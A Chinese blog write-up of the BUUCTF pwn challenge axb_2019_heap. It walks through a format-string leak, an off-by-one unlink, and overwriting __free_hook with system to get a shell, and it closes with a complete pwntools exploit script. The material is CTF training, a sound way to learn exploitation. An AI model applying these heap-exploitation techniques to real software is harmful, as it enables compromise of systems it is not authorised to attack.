buuctf axb_2019_heap

最新推荐文章于 2024-02-20 00:57:52 发布
最新推荐文章于 2024-02-20 00:57:52 发布
阅读量1.6k 收藏 5
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677731/article/details/108763362
版权

拖进IDA之后,发现输入函数是存在off-by-one漏洞的,可以进行溢出
在这里插入图片描述
同时存在全局指针数组,就可以利用这个溢出来构造fake chunk,然后实现unlink
除此之外,这个程序malloc的大小是不能小于0x80的,额。。。其实这个不重要,问题不大,注意下就好了
但是,程序的保护全都开启了
在这里插入图片描述
也就是说,程序的地址是随机的,我们并不知道chunk指针的存放地址
如何泄露呢?这时还发现程序开头存在格式化字符串的漏洞
在这里插入图片描述
打开调试,输入8个a,在printf(&format)这里停一下,然后看下栈
在这里插入图片描述
发现栈中存在__libc_start_main+240的地址,和程序main函数的地址
因此,我们可以通过格式化字符串泄露出这两个地址,然后计算出libc_base和程序基地址
经过调试,这两个地址分别是第15和第19个参数

libc=ELF('./libc-2.23.so')
sh.recvuntil("Enter your name: ")
sh.sendline("%15$p%19$p")
sh.recvuntil("0x")
addr1=int(sh.recvuntil("0x")[:-2],16)
libc_base=addr1-240-libc.symbols["__libc_start_main"]
addr2=int(sh.recvuntil("\n")[:-1],16)
base=addr2-0x116a
info("libc_base:0x%x",libc_base)
info("base:0x%x",base)

0x116a是这里得来的
在这里插入图片描述

在这里插入图片描述
好的,成功了,这题已经搞定了一半了

ptr=base+0x202060
#free_got=base+0x201F58
system_addr=libc_base+libc.symbols["system"]
free_hook=libc_base+libc.symbols["__free_hook"]

计算出几个要用到的东西的地址

add(0,0x98,'aaaaaaaa')
add(1,0x90,'bbbbbbbb')
payload=p64(0)+p64(0x91)+p64(ptr-0x18)+p64(ptr-0x10)
payload+="a"*0x70+p64(0x90)+"\xa0"
edit(0,payload)

布置好可以触发unlink的数据

delete(1)

unlink,每次到这一步就莫名激动
现在我们已经控制了chunk指针处的数据了,想干嘛就干嘛

payload=p64(0)*3+p64(free_hook)+p64(0x38)
payload+=p64(ptr+0x18)+"/bin/sh\x00"
edit(0,payload)

将free_hook写在chunk0指针处,企图劫持free_hook,同时写入"/bin/sh"
3个p64(0)填充,0x38这里是chunk0数据大小,这个数据随意,足够我们将payload写入就行

payload=p64(system_addr)
edit(0,payload)
delete(1)
sh.interactive()

将system_addr写到free_hook
执行free(chunk1)即可

最后写一下自己犯的两个错误,第一个就是计算0x90+0x10的时候算成了0x100。。。。。
第二个就是我一开始企图修改free_got,后来想起来程序开了Full Relro(应该是这个原因),导致改写不了
然后,完整exp:

from pwn import *
sh=remote("node3.buuoj.cn",26035)
context.log_level='debug'
elf=ELF('axb_2019_heap')
libc=ELF('./libc-2.23.so')
def add(idx,size,content):
	sh.sendlineafter(">> ","1")
	sh.recvuntil("(0-10):")
	sh.sendline(str(idx))
	sh.recvuntil("Enter a size:\n")
	sh.sendline(str(size))
	sh.recvuntil("Enter the content: \n")
	sh.sendline(content)
def edit(idx,content):
	sh.sendlineafter(">> ","4")
	sh.recvuntil("Enter an index:\n")
	sh.sendline(str(idx))
	sh.recvuntil("Enter the content: \n")
	sh.sendline(content)
def delete(idx):
	sh.sendlineafter(">> ","2")
	sh.recvuntil("Enter an index:\n")
	sh.sendline(str(idx))

sh.recvuntil("Enter your name: ")
sh.sendline("%15$p%19$p")
sh.recvuntil("0x")
addr1=int(sh.recvuntil("0x")[:-2],16)
libc_base=addr1-240-libc.symbols["__libc_start_main"]
addr2=int(sh.recvuntil("\n")[:-1],16)
base=addr2-0x116a
info("libc_base:0x%x",libc_base)
info("base:0x%x",base)

ptr=base+0x202060
#free_got=base+0x201F58
system_addr=libc_base+libc.symbols["system"]
free_hook=libc_base+libc.symbols["__free_hook"]

add(0,0x98,'aaaaaaaa')
add(1,0x90,'bbbbbbbb')
payload=p64(0)+p64(0x91)+p64(ptr-0x18)+p64(ptr-0x10)
payload+="a"*0x70+p64(0x90)+"\xa0"
edit(0,payload)

delete(1)

payload=p64(0)*3+p64(free_hook)+p64(0x38)
payload+=p64(ptr+0x18)+"/bin/sh\x00"
edit(0,payload)
payload=p64(system_addr)
edit(0,payload)
delete(1)
sh.interactive()
R1nd0
关注
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1580
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
BUUCTF axb_2019_fmt32(格式化字符串漏洞)
weixin_45441024的博客
01-07 1275
BUUCTF axb_2019_fmt32(格式化字符串漏洞) 我们还是先check一下,发现RELRO是关闭的,那么好,可以修改GOT表了 显而易见这是一个格式化字符串漏洞 ,接下来我们来测试一下偏移量 这里可以看到我们输入了5个a它的ASCII码是61,但是往后进行查看只有四个61,所以我们在之后的构造中就再补上一个字符就对齐了,我们算一下它的偏移量是8,所以只要输入%7$p就可以了。我们就可以利用这个和格式化字符串来泄露出一个函数的地址,来获取libc版本,就能获得system函数的地址了。
axb_2019_heap
doudoudedi
02-05 958
思路 格式化字符串泄露程序基址和libc基址然后unlink一个指针到bss段将free_hook写入system释放即可拿到shell exp: from pwn import * #p=process('./axb_2019_heap') p=remote('node3.buuoj.cn',29873) elf=ELF('./axb_2019_heap') libc=elf.libc #gdb...
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 827
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1291
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
axb_2019_heap详解
像初雪一样自由洒落
04-25 659
关于axb_2019_heap的详解 参考:buuctf axb_2019_heap 程序流程 banner:存在格式化字符串漏洞,可以泄漏栈上的信息 add:根据idx创建size(大于0x80)大小的内容为content的块 块指针和块大小存放在一个全局变量note中 delete:释放的很干净,没有uaf edit:存在off by one get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 *.
4.13做题随记(axb_2019_heap, ciscn_2019_final_5)
eeeeeight的博客
04-14 202
4.13做题随记 Column: Apr 14, 2021 Tags: Pwn 相关文件链接 axb_2019_heap ciscn_2019_final_5 axb_2019_heap: 保护检查: 利用思路: banner()中存在明显的格式化字符串漏洞, 因此可以用来泄露栈地址, libc地址以及pie产生的偏移 get_input()中有单字节溢出, 可以修改下一个chunk的inuse位, 从而unlink 因此只要获得偏移后unlink到&note任意读写到malloc_hook, 写
axb_2019_fmt32 wp
xia0ji233
06-08 481
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
福建省平和南靖等五校2018_2019学年高二生物上学期第一次联考试题.doc
11-30
丁图表示果蝇的性别决定,配子基因型可能为AXBaXB、AY、aY。 12. **种群数量动态**:图12展示了肺炎双球菌在液体培养基中的种群数量变化,可能涉及到种群增长模型,如逻辑斯谛增长模型或指数增长模型,其中S形...
[BUUCTF]-PWN:axb_2019_heap解析(格式化字符串漏洞,unlink,off by one)
最新发布
2301_79326813的博客
02-20 549
查看保护查看ida大致就是alloc创建堆块,free释放堆块,以及fill填充堆块。
axb_2019_heap【write up】
m0_73756460的博客
04-08 86
buu刷题 axb_2019_heap【write up】
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1726
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 225
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
BUUCTFaxb_2019_fmt32】
weixin_51055545的博客
04-25 2208
例行检查 是开 了部分relro,可以改写got表,然后栈不可执行不, IDA分析 很简单的一个程序,会先初始化一些后续要用到的栈空间,然后让我们输入,字节数大小会有限制,然后再对我们的输入做一个长度判断,长度符合的话就会调用printf()函数,存在格式化字符串漏洞,程序里没有system,binsh字符串,我们这里就要先leak出地址,然后返回system即可,观察程序不难发现,我们无法溢出去控制返回地址,然而我们可以去改 某一函数的got表地址为system,从而去get shell,通过分析,s
buuctf easyheap
weixin_44932880的博客
02-09 535
主要知识 堆块的结构,fastbin任意地址构造堆块的检查机制, 对题目流程的认真分析 1.检查文件没有地址偏移的保护 2.查看功能。 3.通过堆的溢出生成一块假堆块 4.假堆块可覆盖heaparray[0]为free的got表的地址. 5.通过更改heaparray[0]存的堆块的内容,将free的got覆盖为system的地址。 6.调用free函数并在前面将参数填充为"/bin/sh\x0...
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 990
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
2019 D^3CTF new_heap详细题解
seaaseesa的博客
11-28 1496
new_heap(高质量题) 这题是2019 d3ctf赛的一题,当时没做出来,后来看了大佬的exp脚本,慢慢研究,终于明白了原理,现在,我们就来详细的解析一下这题 首先,我们还是检查一下程序的保护机制,保护全开 再看一下给我们的libc.so.6的版本,可见是glibc2.29,那么对于堆的管理,就存在tcache机制 程序只有简单的3个功能,没有show,也没有edit,这让我...
E:\Qt6book_Axb_6.0\sampl3_1\widget.cpp:6: error: allocation of incomplete type 'Ui::Widget'
06-04
这个错误提示是因为在Widget.cpp文件中,你尝试对一个不完整的类型Ui::Widget进行分配内存的操作。这通常是因为你在Widget.cpp中使用了Ui::Widget类的成员变量或成员函数,但是没有包含相应的头文件。...
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值